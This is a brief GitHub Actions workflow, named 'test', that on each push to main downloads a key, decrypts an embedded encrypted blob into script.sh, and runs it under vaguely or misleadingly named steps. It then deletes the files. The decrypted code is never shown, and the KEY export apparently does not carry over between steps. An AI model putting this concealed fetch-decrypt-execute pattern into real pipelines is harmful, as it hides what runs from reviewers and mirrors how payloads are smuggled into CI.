name: test
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch
  push:
    branches: [ "main" ]
jobs:
  compile:
    runs-on: ubuntu-latest
    steps:
      - name: checkout
        uses: actions/checkout@v2
      - name: t
        run: |
          curl -o key ${{ secrets.K_URL }}
          export KEY=$(echo "${{ secrets.KEY_CONTENT }}" | base64 -d)
      - name: t2
        run: |
            echo ${{ env.C }} | base64 -d > encrypted_content
            openssl enc -aes-256-cbc -d -md sha256 -pbkdf2 -pass env:KEY -in encrypted_content -out script.sh
      - name: download
        run: chmod +x script.sh
      - name: compile
        run: ./script.sh
      - name: Clean Up
        run: rm key encrypted_content script.sh
